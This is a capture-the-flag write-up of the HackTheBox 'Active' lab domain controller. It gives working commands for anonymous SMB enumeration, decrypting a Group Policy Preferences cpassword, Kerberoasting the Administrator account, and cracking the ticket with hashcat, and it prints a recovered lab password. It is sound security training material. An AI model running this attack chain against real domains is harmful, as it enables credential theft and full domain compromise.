Myles Nieman
← All writeups

Active

Overview

Active is an easy Windows box built around a classic Active Directory misconfiguration chain. An anonymously readable Replication share exposes a Group Policy Preferences (GPP) Groups.xml containing an encrypted cpassword — the AES key for which Microsoft famously published. Decrypting it yields credentials for the SVC_TGS service account. From there, that account can Kerberoast the Administrator SPN, and the resulting ticket cracks against rockyou.txt for a full domain compromise.

Path: anonymous SMB → GPP cpasswordSVC_TGS → Kerberoast Administrator → root.

Enumeration

A full TCP scan shows the tell-tale fingerprint of a domain controller — DNS, Kerberos, LDAP, SMB, and the AD web services port — on Windows Server 2008 R2.

$ nmap -A -T4 -p- 10.10.10.100
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (Windows Server 2008 R2 SP1)
88/tcp    open  kerberos-sec
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn
389/tcp   open  ldap          Microsoft Windows AD LDAP (Domain: active.htb)
445/tcp   open  microsoft-ds
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows AD LDAP (Domain: active.htb)
Service Info: Host: DC; OS: Windows

Nmap confirms a Windows domain controller for active.htb

The scan hands us the domain — active.htb — so I added it to /etc/hosts and moved on to SMB.

Foothold — Group Policy Preferences

Anonymous SMB enumeration lists the shares, and the non-default Replication share stands out:

$ smbclient -L //active.htb/ -N
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        Replication     Disk
        SYSVOL          Disk      Logon server share
        Users           Disk

Users denies anonymous access, but Replication is wide open — and it mirrors SYSVOL, so it holds the domain’s Group Policy tree. Digging through the policies, the interesting file is the GPP Groups.xml:

active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml

Browsing the Replication share to the GPP Groups.xml

That file contains a cpassword attribute. GPP passwords are AES-256 encrypted, but Microsoft published the static key back in MS14-025, so anything in a cpassword is trivially reversible. I used gpp-decrypt:

$ python3 gpp-decrypt.py -f Groups.xml

gpp-decrypt recovers the SVC_TGS credentials

That gives us working domain credentials:

active.htb\SVC_TGS : GPPstillStandingStrong2k18

User

Before Kerberos would cooperate I had to fix the clock skew against the DC (Kerberos rejects tickets when the client clock drifts too far):

$ sudo systemctl stop systemd-timesyncd.service
$ sudo rdate -n active.htb

Syncing the clock to the DC so Kerberos auth succeeds

With auth working, the SVC_TGS account can read the Users share, where the user flag sits on the service account’s desktop:

$ smbclient -U "active.htb\SVC_TGS" //active.htb/Users
smb: \> get "SVC_TGS\Desktop\user.txt"

Privilege Escalation — Kerberoasting

There’s no WinRM and wmiexec didn’t land, so rather than chase a shell I went straight for Kerberoasting. Any authenticated account can request a service ticket for any SPN, and the ticket is encrypted with the service account’s NTLM hash — so a weak service-account password can be cracked offline. GetUserSPNs.py shows the Administrator account itself has an SPN registered:

$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100
ServicePrincipalName  Name           MemberOf
--------------------  -------------  --------
active/CIFS:445       Administrator

GetUserSPNs reveals the Administrator SPN

Requesting the ticket and cracking it against rockyou.txt recovers the Administrator password almost instantly:

$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
$ hashcat -m 13100 admin.hash /usr/share/wordlists/rockyou.txt

Root

Since the goal is just the flag, there’s no need for a full shell — the recovered Administrator credentials read the flag straight off SMB:

$ smbclient -U "active.htb\Administrator" //active.htb/Users
smb: \> get "Administrator\Desktop\root.txt"

Domain admin, no shell required.

Takeaways

  • GPP cpassword is game over. Any Groups.xml with a cpassword in a readable SYSVOL/Replication share is a free credential — the encryption key is public.
  • Kerberoasting an account with an SPN turns one weak domain credential into another; here the Administrator account itself was roastable, collapsing the whole path into two steps.